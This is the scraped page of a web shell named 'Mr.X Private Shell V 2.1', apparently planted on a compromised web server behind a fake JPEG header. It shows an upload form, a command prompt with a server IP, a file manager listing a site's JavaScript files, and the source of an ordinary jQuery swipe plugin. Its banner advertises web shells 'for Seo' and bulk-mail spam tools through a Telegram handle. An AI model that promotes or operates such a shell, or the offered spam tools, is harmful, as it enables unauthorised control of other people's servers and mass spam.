����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
/*! swipe plugin for Cycle2;  version: 20121120 */
(function($) {
    "use strict";

// this script adds support for touch events.  the logic is lifted from jQuery Mobile.
// if you have jQuery Mobile installed, you do NOT need this script

    var supportTouch = 'ontouchend' in document;

    $.event.special.swipe = $.event.special.swipe || {
        scrollSupressionThreshold: 10,   // More than this horizontal displacement, and we will suppress scrolling.
        durationThreshold: 1000,         // More time than this, and it isn't a swipe.
        horizontalDistanceThreshold: 30, // Swipe horizontal displacement must be more than this.
        verticalDistanceThreshold: 75,   // Swipe vertical displacement must be less than this.

        setup: function() {
            var $this = $( this );

            $this.bind( 'touchstart', function( event ) {
                var data = event.originalEvent.touches ? event.originalEvent.touches[ 0 ] : event;
                var stop, start = {
                    time: ( new Date() ).getTime(),
                    coords: [ data.pageX, data.pageY ],
                    origin: $( event.target )
                };

                function moveHandler( event ) {
                    if ( !start )
                        return;

                    var data = event.originalEvent.touches ? event.originalEvent.touches[ 0 ] : event;

                    stop = {
                        time: ( new Date() ).getTime(),
                        coords: [ data.pageX, data.pageY ]
                    };

                    // prevent scrolling
                    if ( Math.abs( start.coords[ 0 ] - stop.coords[ 0 ] ) > $.event.special.swipe.scrollSupressionThreshold ) {
                        event.preventDefault();
                    }
                }

                $this.bind( 'touchmove', moveHandler )
                    .one( 'touchend', function( event ) {
                        $this.unbind( 'touchmove', moveHandler );

                        if ( start && stop ) {
                            if ( stop.time - start.time < $.event.special.swipe.durationThreshold &&
                                Math.abs( start.coords[ 0 ] - stop.coords[ 0 ] ) > $.event.special.swipe.horizontalDistanceThreshold &&
                                Math.abs( start.coords[ 1 ] - stop.coords[ 1 ] ) < $.event.special.swipe.verticalDistanceThreshold ) {

                                start.origin.trigger( "swipe" )
                                    .trigger( start.coords[0] > stop.coords[ 0 ] ? "swipeleft" : "swiperight" );
                            }
                        }
                        start = stop = undefined;
                    });
            });
        }
    };

    $.event.special.swipeleft = $.event.special.swipeleft || {
        setup: function() {
            $( this ).bind( 'swipe', $.noop );
        }
    };
    $.event.special.swiperight = $.event.special.swiperight || $.event.special.swipeleft;

})(jQuery);

Filemanager

Name Type Size Permission Actions
lib Folder 0755
slider Folder 0755
carousel.js File 12.58 KB 0644
carousel.min.js File 5.85 KB 0644
jquery.cycle.js File 52.81 KB 0644
jquery.cycle.min.js File 22.4 KB 0644
jquery.cycle.swipe.js File 2.95 KB 0644
jquery.cycle.swipe.min.js File 1.25 KB 0644
jquery.touchSwipe.js File 76.65 KB 0644
jquery.touchSwipe.min.js File 10.24 KB 0644
sow.google-map.js File 19.28 KB 0644
sow.google-map.min.js File 9.59 KB 0644
sow.jquery.fittext.js File 2.06 KB 0644
sow.jquery.fittext.min.js File 1.1 KB 0644